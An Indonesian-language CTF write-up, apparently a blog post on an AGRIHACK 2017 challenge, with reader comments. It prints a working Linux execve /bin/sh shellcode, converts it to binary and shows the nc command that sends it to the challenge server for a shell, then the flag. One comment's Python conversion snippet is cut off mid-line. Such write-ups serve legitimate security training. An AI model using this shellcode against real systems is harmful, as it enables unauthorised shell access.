9:05:00 PM
nc ke kebon.agrihack.party 30003
disini kita di suruh memasukkan shellcode dalam bentuk biner, ok kita coba, disini saya menggunakan shell code dari shell-strom.org , petunjuk di soal data yang di kirim harus dalam bentuk biner, yaudah payload dari shellcode di atas kita ubah dulu dari hexa base16 ke biner,
payload = \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
biner= 001100011100100111110111111000010101000101101000001011110010111101110011011010000110100000101111011000100110100101101110100010011110001110110000000010111100110110000000
hasil disasmble payload menggunakan library dari pwntools :
kita coba aja dulu kirim payload ke program yang jalan,..
$ (python -c "print '001100011100100111110111111000010101000101101000001011110010111101110011011010000110100000101111011000100110100101101110100010011110001110110000000010111100110110000000'";cat -) | nc kebon.agrihack.party 30002
\\m// yeay..
flag : AGRI{shellcode_itu_keren_tapi_gw_gak_ngerti}
cara konvert payload = \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80 ke binary gimana kak.?
ReplyDelete
Deletefrom binascii import hexlify, unhexlify
payload = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x$
payload_bin = bin(int(hexlify(payload),16))[2:]
print payload_bin
min, nyimpen semua soal soal AGRIHACK2017 kmaren? kalo boleh minta dong.
ReplyDeletekaya soal soal basic, forensic, reverse, sama crypto yg ada filenya
ada beberapa yang masih ada dan ada yg udah kehapus om
Deleteboleh minta om?
Delete